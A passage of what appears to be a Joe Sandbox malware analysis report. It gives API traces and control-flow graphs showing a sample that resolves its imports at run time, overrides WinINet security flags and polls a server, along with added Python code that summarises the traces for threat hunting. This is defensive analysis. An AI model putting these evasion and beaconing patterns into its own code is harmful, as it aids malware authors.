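    decoded = [decode_call(c) for c in parse(trace)]
    first: Dict[str, dict] = {}
    for d in decoded:
        first.setdefault(d["api"], d)
    req, opt = first.get("HttpOpenRequestA", {}), first.get("InternetSetOptionA", {})
    return {
        "sequence": [d["api"] for d in decoded],
        "access_type": first.get("InternetOpenA", {}).get("access_type"),
        "verb": req.get("verb"),
        "request_flags": req.get("flags", []),
        "security_flags_overridden": opt.get("option") == "INTERNET_OPTION_SECURITY_FLAGS",
        "security_flags_value_known": opt.get("value_captured", False),
        "status_code_checked": first.get("HttpQueryInfoA", {}).get("info_level") == "HTTP_QUERY_STATUS_CODE",
        "read_chunk_bytes": first.get("InternetReadFile", {}).get("chunk_bytes"),
    }
```

Run on the trace above, the record shows the request flags 00400100 as INTERNET_FLAG_KEEP_CONNECTION plus INTERNET_FLAG_PRAGMA_NOCACHE, option 0000001F as INTERNET_OPTION_SECURITY_FLAGS, info level 00000013 as HTTP_QUERY_STATUS_CODE and a 1999-byte read size. A hunt over other sandbox traces can key on that order rather than on any address: InternetSetOptionA with option 0x1F between HttpOpenRequestA and HttpSendRequestA, followed by a status-code query and InternetReadFile.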
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: the same 14 memory dumps as listed for the previous functions
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                            • Instruction ID: 6e16944608dc63ea6d3a9f65c249c60cada6f8bcf7c3beec70a1a06307d3152a
                            • Opcode Fuzzy Hash: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                            • Instruction Fuzzy Hash: 27F04FB1944609AFDB00DF99DD4AFAEBFB8FB04715F10025AFA05A2680C77815048BA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: the same 14 memory dumps as listed for the previous functions
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                            • Instruction ID: ddcf895beb346e7908b5dd2dd2d339100d6328637f3f925fcba0c875c603a022
                            • Opcode Fuzzy Hash: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                            • Instruction Fuzzy Hash: B2D05E7490030CDFCB00EFE0DC8DADDBBB8FB08315F000594D90562340EA305486CBA6

                            Control-flow Graph

                            Control-flow graph of the import-resolution routine at 399c10 (the rendered graph is not reproduced; its legend marked basic blocks as Executed / Not Executed). Block list recovered from the graph data, as id: address range, API calls in the block -> successors:
                            • 633: 399c10-399c1a -> 634, 635
                            • 634: 399c20-39a031, GetProcAddress × 43 -> 635
                            • 635: 39a036-39a0ca, LoadLibraryA × 8 -> 636, 637
                            • 636: 39a0cc-39a141, GetProcAddress × 5 -> 637
                            • 637: 39a146-39a14d -> 638, 639
                            • 638: 39a153-39a211, GetProcAddress × 8 -> 639
                            • 639: 39a216-39a21d -> 640, 641
                            • 640: 39a298-39a29f -> 642, 643
                            • 641: 39a21f-39a293, GetProcAddress × 5 -> 640
                            • 642: 39a2a5-39a332, GetProcAddress × 6
                            • 643: 39a337-39a33e -> 644, 645
                            • 644: 39a41f-39a426 -> 646, 647
                            • 645: 39a344-39a41a, GetProcAddress × 9 -> 644
                            • 646: 39a428-39a49d, GetProcAddress × 5
                            • 647: 39a4a2-39a4a9 -> 648, 649
                            • 648: 39a4ab-39a4d7, GetProcAddress × 2 -> 649
                            • 649: 39a4dc-39a4e3 -> 650, 651
                            • 650: 39a515-39a51c -> 652, 653
                            • 651: 39a4e5-39a510, GetProcAddress × 2 -> 650
                            • 652: 39a612-39a619 -> 654, 655
                            • 653: 39a522-39a60d, GetProcAddress × 10 -> 652
                            • 654: 39a61b-39a678, GetProcAddress × 4
                            • 655: 39a67d-39a684 -> 656, 657
                            • 656: 39a69e-39a6a5 -> 658, 659
                            • 657: 39a686-39a699, GetProcAddress × 1 -> 656
                            • 658: 39a708-39a709 (end of routine)
                            • 659: 39a6a7-39a703, GetProcAddress × 4 -> 658
                            Blocks 642, 646 and 654 have no successor recorded in the graph data. The shape is a chain of pairs: one block resolves several exports of a single module with repeated GetProcAddress calls, then a short block (637, 639, 640, 643, 644, 647, 649, 650, 652, 655, 656) branches either into the next resolution block or past it. That layout is what a null check on each module handle before resolving that module's exports looks like; the block ids are the sandbox's own. In the API list that follows, the second GetProcAddress argument is almost always a pointer into the 0114xxxx-0115xxxx range rather than a literal name, so the export names are assembled in memory at run time; only InternetSetOptionA and HttpQueryInfoA appear in clear, which identifies the 6F070000 module as wininet.dll. The module handles themselves (74DD0000, 75290000 and so on) are load addresses from this one run and must not be reused as indicators.
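
The control-flow graph above is a resolver: every export this sample uses is looked up at run time with GetProcAddress on a handle from LoadLibraryA, which is why the static import table says little about the sample. The following Python is an added example (not part of the report and not code from the sample) that reads the report's own API lines and summarizes the resolution: which module handles were used, how many exports each supplied, whether a module was already mapped before the first LoadLibraryA, and which names the sandbox could print in clear. The embedded trace is an excerpt of the list below, constructed as input for the example; the mapping of a plaintext export name to its DLL is Windows SDK knowledge supplied by the example, not something the report states.

```python
"""Summarize run-time import resolution (LoadLibraryA / GetProcAddress)
from Joe Sandbox API trace lines.

Added example, not part of the report or of the analysed sample. The input
is an excerpt, constructed here, of the report's API list for the resolver
at 399c10; the real routine makes far more GetProcAddress calls than shown.
"""
import re
from typing import Dict, List

TRACE = """
GetProcAddress.KERNEL32(74DD0000,01145270), ref: 00399C2D
GetProcAddress.KERNEL32(74DD0000,01145410), ref: 00399C45
GetProcAddress.KERNEL32(74DD0000,01159310), ref: 00399C5E
LoadLibraryA.KERNEL32(0115D2A0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A03D
LoadLibraryA.KERNEL32(0115D138,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A04E
GetProcAddress.KERNEL32(75290000,01145710), ref: 0039A0DA
GetProcAddress.KERNEL32(6F070000,01145790), ref: 0039A530
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0039A5F1
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0039A607
GetProcAddress.KERNEL32(75AF0000,0115CF10), ref: 0039A629
"""

LINE_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{8})$")
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")

# Which DLL exports a name that appeared in clear. Windows SDK knowledge
# supplied by this example; the report itself names no DLLs.
EXPORT_TO_DLL = {"InternetSetOptionA": "wininet.dll", "HttpQueryInfoA": "wininet.dll"}


def parse(trace: str) -> List[dict]:
    """One record per trace line: api, argument strings, call site."""
    calls = []
    for line in trace.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            api, _module, args, ref = m.groups()
            calls.append({"api": api, "args": args.split(","), "ref": ref})
    return calls


def count_loadlibrary(trace: str) -> int:
    return sum(1 for c in parse(trace) if c["api"] == "LoadLibraryA")


def resolve_summary(trace: str) -> Dict[str, dict]:
    """Group GetProcAddress calls by module handle, in first-seen order.

    A second argument of 8 hex digits is a pointer to a buffer the sample
    filled at run time (the export name was decoded in memory); anything
    else is a name the sandbox could print in clear.
    """
    modules: Dict[str, dict] = {}
    loads_seen = 0
    for c in parse(trace):
        if c["api"] == "LoadLibraryA":
            loads_seen += 1
            continue
        if c["api"] != "GetProcAddress":
            continue
        handle, name = c["args"][0], c["args"][1]
        entry = modules.setdefault(handle, {
            "resolved": 0,
            "plaintext_names": [],
            "dll": None,
            # True for a module used before any LoadLibraryA: it was already
            # mapped in the process (kernel32.dll is the usual candidate).
            "preloaded": loads_seen == 0,
        })
        entry["resolved"] += 1
        if not HEX8.fullmatch(name):
            entry["plaintext_names"].append(name)
            entry["dll"] = EXPORT_TO_DLL.get(name, entry["dll"])
    return modules


def hidden_name_ratio(modules: Dict[str, dict]) -> float:
    """Share of GetProcAddress calls whose export name never appeared in clear."""
    total = sum(m["resolved"] for m in modules.values())
    clear = sum(len(m["plaintext_names"]) for m in modules.values())
    return 1.0 - clear / total if total else 0.0


if __name__ == "__main__":
    mods = resolve_summary(TRACE)
    for handle, m in mods.items():
        print(handle, m["resolved"], m["dll"] or "?", m["plaintext_names"], "preloaded" if m["preloaded"] else "")
    print(f"LoadLibraryA calls: {count_loadlibrary(TRACE)}; names hidden: {hidden_name_ratio(mods):.0%}")
```

Fed the full list below instead of the excerpt, the same code reports 43 lookups on 74DD0000 before any LoadLibraryA, eight LoadLibraryA calls, and only two names in clear, both on 6F070000. A signature should key on that pattern, a long GetProcAddress run whose name argument is a heap pointer rather than a literal, and not on the handle values, which change with every load.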
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01145270), ref: 00399C2D
                            • GetProcAddress.KERNEL32(74DD0000,01145410), ref: 00399C45
                            • GetProcAddress.KERNEL32(74DD0000,01159310), ref: 00399C5E
                            • GetProcAddress.KERNEL32(74DD0000,011593A0), ref: 00399C76
                            • GetProcAddress.KERNEL32(74DD0000,01159430), ref: 00399C8E
                            • GetProcAddress.KERNEL32(74DD0000,011593D0), ref: 00399CA7
                            • GetProcAddress.KERNEL32(74DD0000,0114B9D0), ref: 00399CBF
                            • GetProcAddress.KERNEL32(74DD0000,0115D1E0), ref: 00399CD7
                            • GetProcAddress.KERNEL32(74DD0000,0115D150), ref: 00399CF0
                            • GetProcAddress.KERNEL32(74DD0000,0115D228), ref: 00399D08
                            • GetProcAddress.KERNEL32(74DD0000,0115D1F8), ref: 00399D20
                            • GetProcAddress.KERNEL32(74DD0000,011454D0), ref: 00399D39
                            • GetProcAddress.KERNEL32(74DD0000,011455B0), ref: 00399D51
                            • GetProcAddress.KERNEL32(74DD0000,01145290), ref: 00399D69
                            • GetProcAddress.KERNEL32(74DD0000,01145470), ref: 00399D82
                            • GetProcAddress.KERNEL32(74DD0000,0115D330), ref: 00399D9A
                            • GetProcAddress.KERNEL32(74DD0000,0115D210), ref: 00399DB2
                            • GetProcAddress.KERNEL32(74DD0000,0114B8B8), ref: 00399DCB
                            • GetProcAddress.KERNEL32(74DD0000,01145490), ref: 00399DE3
                            • GetProcAddress.KERNEL32(74DD0000,0115D108), ref: 00399DFB
                            • GetProcAddress.KERNEL32(74DD0000,0115D0F0), ref: 00399E14
                            • GetProcAddress.KERNEL32(74DD0000,0115D1C8), ref: 00399E2C
                            • GetProcAddress.KERNEL32(74DD0000,0115D270), ref: 00399E44
                            • GetProcAddress.KERNEL32(74DD0000,011455D0), ref: 00399E5D
                            • GetProcAddress.KERNEL32(74DD0000,0115D2B8), ref: 00399E75
                            • GetProcAddress.KERNEL32(74DD0000,0115D2D0), ref: 00399E8D
                            • GetProcAddress.KERNEL32(74DD0000,0115D168), ref: 00399EA6
                            • GetProcAddress.KERNEL32(74DD0000,0115D180), ref: 00399EBE
                            • GetProcAddress.KERNEL32(74DD0000,0115D390), ref: 00399ED6
                            • GetProcAddress.KERNEL32(74DD0000,0115D288), ref: 00399EEF
                            • GetProcAddress.KERNEL32(74DD0000,0115D0D8), ref: 00399F07
                            • GetProcAddress.KERNEL32(74DD0000,0115D240), ref: 00399F1F
                            • GetProcAddress.KERNEL32(74DD0000,0115D258), ref: 00399F38
                            • GetProcAddress.KERNEL32(74DD0000,0115A1F0), ref: 00399F50
                            • GetProcAddress.KERNEL32(74DD0000,0115D348), ref: 00399F68
                            • GetProcAddress.KERNEL32(74DD0000,0115D198), ref: 00399F81
                            • GetProcAddress.KERNEL32(74DD0000,011452B0), ref: 00399F99
                            • GetProcAddress.KERNEL32(74DD0000,0115D1B0), ref: 00399FB1
                            • GetProcAddress.KERNEL32(74DD0000,011454F0), ref: 00399FCA
                            • GetProcAddress.KERNEL32(74DD0000,0115D318), ref: 00399FE2
                            • GetProcAddress.KERNEL32(74DD0000,0115D120), ref: 00399FFA
                            • GetProcAddress.KERNEL32(74DD0000,011455F0), ref: 0039A013
                            • GetProcAddress.KERNEL32(74DD0000,01145610), ref: 0039A02B
                            • LoadLibraryA.KERNEL32(0115D2A0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A03D
                            • LoadLibraryA.KERNEL32(0115D138,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A04E
                            • LoadLibraryA.KERNEL32(0115D3A8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A060
                            • LoadLibraryA.KERNEL32(0115D2E8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A072
                            • LoadLibraryA.KERNEL32(0115D300,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A083
                            • LoadLibraryA.KERNEL32(0115D360,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A095
                            • LoadLibraryA.KERNEL32(0115D378,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0A7
                            • LoadLibraryA.KERNEL32(0115D3C0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0B8
                            • GetProcAddress.KERNEL32(75290000,01145710), ref: 0039A0DA
                            • GetProcAddress.KERNEL32(75290000,0115D558), ref: 0039A0F2
                            • GetProcAddress.KERNEL32(75290000,01159060), ref: 0039A10A
                            • GetProcAddress.KERNEL32(75290000,0115D570), ref: 0039A123
                            • GetProcAddress.KERNEL32(75290000,01145850), ref: 0039A13B
                            • GetProcAddress.KERNEL32(73560000,0114B9F8), ref: 0039A160
                            • GetProcAddress.KERNEL32(73560000,01145750), ref: 0039A179
                            • GetProcAddress.KERNEL32(73560000,0114B7A0), ref: 0039A191
                            • GetProcAddress.KERNEL32(73560000,0115D468), ref: 0039A1A9
                            • GetProcAddress.KERNEL32(73560000,0115D4B0), ref: 0039A1C2
                            • GetProcAddress.KERNEL32(73560000,01145830), ref: 0039A1DA
                            • GetProcAddress.KERNEL32(73560000,011456F0), ref: 0039A1F2
                            • GetProcAddress.KERNEL32(73560000,0115D4F8), ref: 0039A20B
                            • GetProcAddress.KERNEL32(752C0000,01145930), ref: 0039A22C
                            • GetProcAddress.KERNEL32(752C0000,011456D0), ref: 0039A244
                            • GetProcAddress.KERNEL32(752C0000,0115D3F0), ref: 0039A25D
                            • GetProcAddress.KERNEL32(752C0000,0115D510), ref: 0039A275
                            • GetProcAddress.KERNEL32(752C0000,011458F0), ref: 0039A28D
                            • GetProcAddress.KERNEL32(74EC0000,0114B868), ref: 0039A2B3
                            • GetProcAddress.KERNEL32(74EC0000,0114BB60), ref: 0039A2CB
                            • GetProcAddress.KERNEL32(74EC0000,0115D3D8), ref: 0039A2E3
                            • GetProcAddress.KERNEL32(74EC0000,011458D0), ref: 0039A2FC
                            • GetProcAddress.KERNEL32(74EC0000,01145730), ref: 0039A314
                            • GetProcAddress.KERNEL32(74EC0000,0114BA70), ref: 0039A32C
                            • GetProcAddress.KERNEL32(75BD0000,0115D528), ref: 0039A352
                            • GetProcAddress.KERNEL32(75BD0000,01145770), ref: 0039A36A
                            • GetProcAddress.KERNEL32(75BD0000,01159070), ref: 0039A382
                            • GetProcAddress.KERNEL32(75BD0000,0115D540), ref: 0039A39B
                            • GetProcAddress.KERNEL32(75BD0000,0115D588), ref: 0039A3B3
                            • GetProcAddress.KERNEL32(75BD0000,011457B0), ref: 0039A3CB
                            • GetProcAddress.KERNEL32(75BD0000,01145630), ref: 0039A3E4
                            • GetProcAddress.KERNEL32(75BD0000,0115D450), ref: 0039A3FC
                            • GetProcAddress.KERNEL32(75BD0000,0115D480), ref: 0039A414
                            • GetProcAddress.KERNEL32(75A70000,01145910), ref: 0039A436
                            • GetProcAddress.KERNEL32(75A70000,0115D4C8), ref: 0039A44E
                            • GetProcAddress.KERNEL32(75A70000,0115D408), ref: 0039A466
                            • GetProcAddress.KERNEL32(75A70000,0115D420), ref: 0039A47F
                            • GetProcAddress.KERNEL32(75A70000,0115D438), ref: 0039A497
                            • GetProcAddress.KERNEL32(75450000,011456B0), ref: 0039A4B8
                            • GetProcAddress.KERNEL32(75450000,011457D0), ref: 0039A4D1
                            • GetProcAddress.KERNEL32(75DA0000,01145950), ref: 0039A4F2
                            • GetProcAddress.KERNEL32(75DA0000,0115D498), ref: 0039A50A
                            • GetProcAddress.KERNEL32(6F070000,01145790), ref: 0039A530
                            • GetProcAddress.KERNEL32(6F070000,011457F0), ref: 0039A548
                            • GetProcAddress.KERNEL32(6F070000,01145810), ref: 0039A560
                            • GetProcAddress.KERNEL32(6F070000,0115D4E0), ref: 0039A579
                            • GetProcAddress.KERNEL32(6F070000,01145870), ref: 0039A591
                            • GetProcAddress.KERNEL32(6F070000,01145650), ref: 0039A5A9
                            • GetProcAddress.KERNEL32(6F070000,01145970), ref: 0039A5C2
                            • GetProcAddress.KERNEL32(6F070000,01145890), ref: 0039A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0039A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0039A607
                            • GetProcAddress.KERNEL32(75AF0000,0115CF10), ref: 0039A629
                            • GetProcAddress.KERNEL32(75AF0000,011590A0), ref: 0039A641
                            • GetProcAddress.KERNEL32(75AF0000,0115CDD8), ref: 0039A659
                            • GetProcAddress.KERNEL32(75AF0000,0115D060), ref: 0039A672
                            • GetProcAddress.KERNEL32(75D90000,011458B0), ref: 0039A693
                            • GetProcAddress.KERNEL32(6F960000,0115CF40), ref: 0039A6B4
                            • GetProcAddress.KERNEL32(6F960000,01145670), ref: 0039A6CD
                            • GetProcAddress.KERNEL32(6F960000,0115D048), ref: 0039A6E5
                            • GetProcAddress.KERNEL32(6F960000,0115CFD0), ref: 0039A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                            • Instruction ID: 701fd599167cd8c19d1371658738c6bee902014338ffe8dcf5958d3c3943077f
                            • Opcode Fuzzy Hash: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                            • Instruction Fuzzy Hash: D0628DB5500A48AFC748DFA8FD88D563FF9F7AC309304851AA609C3225D739985AFF52

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 858 395510-395577 call 395ad0 call 39a820 * 3 call 39a740 * 4 874 39557c-395583 858->874 875 395585-3955b6 call 39a820 call 39a7a0 call 381590 call 3951f0 874->875 876 3955d7-39564c call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 874->876 892 3955bb-3955d2 call 39a8a0 call 39a800 875->892 902 395693-3956a9 call 39aad0 StrCmpCA 876->902 906 39564e-39568e call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 876->906 892->902 907 3957dc-395844 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 902->907 908 3956af-3956b6 902->908 906->902 1038 395ac3-395ac6 907->1038 911 3957da-39585f call 39aad0 StrCmpCA 908->911 912 3956bc-3956c3 908->912 931 395991-3959f9 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 911->931 932 395865-39586c 911->932 916 39571e-395793 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 912->916 917 3956c5-395719 call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 912->917 916->911 1017 395795-3957d5 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 916->1017 917->911 931->1038 938 39598f-395a14 call 39aad0 StrCmpCA 932->938 939 395872-395879 932->939 967 395a28-395a91 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 938->967 968 395a16-395a21 Sleep 938->968 946 39587b-3958ce call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 939->946 947 3958d3-395948 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 939->947 946->938 947->938 1043 39594a-39598a call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 947->1043 967->1038 968->874 1017->911 1043->938
                            APIs
                              • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                              • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003956A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395857
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 003952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 0039532F
                              • Part of subcall function 003952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 00395383
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 003953AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0039578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00395A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                            • Instruction ID: 2960518bf6c2880505fcc4c67a64aaca3d9fbfc4db0db7590fa2eb74dbc8b190
                            • Opcode Fuzzy Hash: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                            • Instruction Fuzzy Hash: F4E13072910A089ADF16FBB0DC97EED777CAF54300F408668B4066A091EF346A4DDBD2

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1069 3917a0-3917cd call 39aad0 StrCmpCA 1072 3917cf-3917d1 ExitProcess 1069->1072 1073 3917d7-3917f1 call 39aad0 1069->1073 1077 3917f4-3917f8 1073->1077 1078 3917fe-391811 1077->1078 1079 3919c2-3919cd call 39a800 1077->1079 1081 39199e-3919bd 1078->1081 1082 391817-39181a 1078->1082 1081->1077 1084 39185d-39186e StrCmpCA 1082->1084 1085 39187f-391890 StrCmpCA 1082->1085 1086 3918f1-391902 StrCmpCA 1082->1086 1087 391951-391962 StrCmpCA 1082->1087 1088 391970-391981 StrCmpCA 1082->1088 1089 391913-391924 StrCmpCA 1082->1089 1090 391932-391943 StrCmpCA 1082->1090 1091 391835-391844 call 39a820 1082->1091 1092 391849-391858 call 39a820 1082->1092 1093 3918ad-3918be StrCmpCA 1082->1093 1094 3918cf-3918e0 StrCmpCA 1082->1094 1095 39198f-391999 call 39a820 1082->1095 1096 391821-391830 call 39a820 1082->1096 1110 39187a 1084->1110 1111 391870-391873 1084->1111 1112 39189e-3918a1 1085->1112 1113 391892-39189c 1085->1113 1118 39190e 1086->1118 1119 391904-391907 1086->1119 1101 39196e 1087->1101 1102 391964-391967 1087->1102 1104 39198d 1088->1104 1105 391983-391986 1088->1105 1097 391930 1089->1097 1098 391926-391929 1089->1098 1099 39194f 1090->1099 1100 391945-391948 1090->1100 1091->1081 1092->1081 1114 3918ca 1093->1114 1115 3918c0-3918c3 1093->1115 1116 3918ec 1094->1116 1117 3918e2-3918e5 1094->1117 1095->1081 1096->1081 1097->1081 1098->1097 1099->1081 1100->1099 1101->1081 1102->1101 1104->1081 1105->1104 1110->1081 1111->1110 1123 3918a8 1112->1123 1113->1123 1114->1081 1115->1114 1116->1081 1117->1116 1118->1081 1119->1118 1123->1081
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003917C5
                            • ExitProcess.KERNEL32 ref: 003917D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
